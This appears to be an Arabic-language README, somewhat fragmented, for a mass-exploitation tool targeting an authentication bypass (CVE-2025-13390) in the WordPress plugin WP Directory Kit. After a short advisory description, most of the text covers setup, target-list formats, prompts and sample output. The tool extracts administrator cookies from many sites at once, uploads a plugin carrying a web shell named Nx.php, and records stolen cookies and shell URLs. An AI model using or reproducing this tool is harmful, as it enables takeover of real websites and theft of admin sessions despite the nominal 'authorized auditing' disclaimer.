
WP Directory Kit <= 1.4.4 - تجاوز المصادقة إلى تصعيد الامتيازات عبر الاستيلاء على الحساب
WP Directory Kit <= 1.4.4 - تجاوز المصادقة إلى تصعيد الامتيازات عبر الاستيلاء على الحساب
إضافة WP Directory Kit لووردبريس عرضة لتجاوز المصادقة في جميع الإصدارات حتى 1.4.4 ضمنًا، وذلك بسبب تنفيذ غير صحيح لخوارزمية المصادقة في الدالة
wdk_generate_auto_login_link.يعود السبب إلى استخدام الميزة لآلية توليد رموز ضعيفة تشفيريًا. هذا الخلل يتيح للمهاجمين غير المصادَقين الحصول على وصول إداري وتحقيق الاستيلاء الكامل على الموقع عبر نقطة نهاية تسجيل الدخول التلقائي باستخدام رمز يمكن توقعه.
- CNA: Wordfence
- النتيجة الأساسية: 10.0 حرجة
- المتجه:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php).Nx.php).pip install -r requirements.txt
# Or individually:
pip install requests beautifulsoup4 colorama
Nxploited.zip) يحتوي على الشيل الخاص بك باسم Nx.php في الجذر.list.txt) يحتوي على عنوان URL/مضيف واحد في كل سطر.http(s)://) أو مجرد نطاقات/عناوين IP.http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txtNxploited.zipsuccess_cookies.txt — المواقع التي تم فيها استخراج كوكيز مدير ناجحة.success_shells.txt — عناوين URL للشيلات التي تم رفعها بنجاح.uploads_log.txt — سجل كامل لمحاولات رفع المكوّنات. _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
8, 16, إلخ)1 = المدير)/wp-content/plugins/ للحمولة الخاصة بك (الافتراضي مأخوذ من اسم ملف ZIP)